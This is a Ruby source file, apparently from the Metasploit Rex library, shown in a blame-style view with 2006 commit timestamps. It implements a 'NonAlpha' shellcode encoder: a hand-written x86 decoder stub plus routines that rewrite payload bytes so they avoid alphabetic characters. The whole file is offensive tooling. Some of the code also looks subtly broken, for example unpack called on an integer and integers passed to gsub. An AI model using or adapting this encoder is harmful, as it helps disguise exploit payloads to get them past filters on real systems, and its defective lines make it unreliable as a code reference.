2006-04-20 21:11:33 +00:00
|
|
|
#!/usr/bin/env ruby
|
|
|
|
|
|
|
|
require 'rex/text'
|
|
|
|
|
|
|
|
module Rex
|
|
|
|
module Encoder
|
|
|
|
|
|
|
|
class NonAlpha
|
2006-04-24 15:01:25 +00:00
|
|
|
|
2006-04-20 21:11:33 +00:00
|
|
|
|
|
|
|
def NonAlpha.gen_decoder()
|
2006-04-24 15:42:40 +00:00
|
|
|
decoder =
|
|
|
|
"\x66\xB9\xFF\xFF" +
|
2006-04-20 21:11:33 +00:00
|
|
|
"\xEB\x19" + # Jmp to table
|
|
|
|
"\x5E" + # pop esi
|
|
|
|
"\x8B\xFE" + # mov edi, esi - Get table addr
|
|
|
|
"\x83\xC7" + "A" + # add edi, tablelen - Get shellcode addr
|
2006-04-24 15:42:40 +00:00
|
|
|
"\x8B\xD7" + # mov edx, edi - Hold end of table ptr
|
|
|
|
"\x3B\xF2" + # cmp esi, edx
|
|
|
|
"\x7D\x0B" + # jle to end
|
2006-04-20 21:11:33 +00:00
|
|
|
"\xB0\x7B" + # mov eax, 0x7B - Set up eax with magic
|
|
|
|
"\xF2\xAE" + # repne scasb - Find magic!
|
|
|
|
"\xFF\xCF" + # dec edi - scasb purs us one ahead
|
|
|
|
"\xAC" + # lodsb
|
|
|
|
"\x28\x07" + # subb [edi], al
|
2006-04-21 13:28:04 +00:00
|
|
|
"\xEB\xF1" + # jmp BACK!
|
2006-04-20 21:11:33 +00:00
|
|
|
"\xEB" + "B" + # jmp [shellcode]
|
|
|
|
"\xE8\xE2\xFF\xFF\xFF"
|
|
|
|
end
|
|
|
|
|
|
|
|
def NonAlpha.encode_byte(block, table, tablelen)
|
2006-04-24 17:49:04 +00:00
|
|
|
if (tablelen > 255) or (block == 0x7B)
|
2006-04-24 14:38:34 +00:00
|
|
|
raise RuntimeError, "BadChar"
|
|
|
|
end
|
|
|
|
|
2006-04-24 17:49:04 +00:00
|
|
|
if (block >= 0x41 and block <= 0x5A) or (block >= 0x61 and block <= 0x7A)
|
2006-04-20 21:11:33 +00:00
|
|
|
# gen offset, return magic
|
|
|
|
offset = 0x7b - block;
|
2006-04-24 14:38:34 +00:00
|
|
|
table += offset.chr
|
2006-04-20 21:11:33 +00:00
|
|
|
tablelen = tablelen + 1
|
2006-04-24 14:38:34 +00:00
|
|
|
block = 0x7B
|
2006-04-20 21:11:33 +00:00
|
|
|
end
|
|
|
|
|
2006-04-24 15:01:25 +00:00
|
|
|
return [block.chr, table, tablelen]
|
2006-04-20 21:11:33 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def NonAlpha.encode(buf)
|
|
|
|
table = ""
|
|
|
|
tablelen = 0
|
|
|
|
nonascii = ""
|
|
|
|
encoded = gen_decoder()
|
|
|
|
buf.each_byte {
|
|
|
|
|block|
|
|
|
|
|
2006-04-24 15:01:25 +00:00
|
|
|
newchar, table, tablelen = encode_byte(block.unpack('C')[0], table, tablelen)
|
2006-04-20 21:11:33 +00:00
|
|
|
nonascii += newchar
|
|
|
|
}
|
|
|
|
encoded.gsub!(/A/, tablelen)
|
|
|
|
encoded.gsub!(/B/, tablelen+5)
|
|
|
|
encoded += table
|
|
|
|
encoded += nonascii
|
|
|
|
end
|
|
|
|
|
|
|
|
end end end
|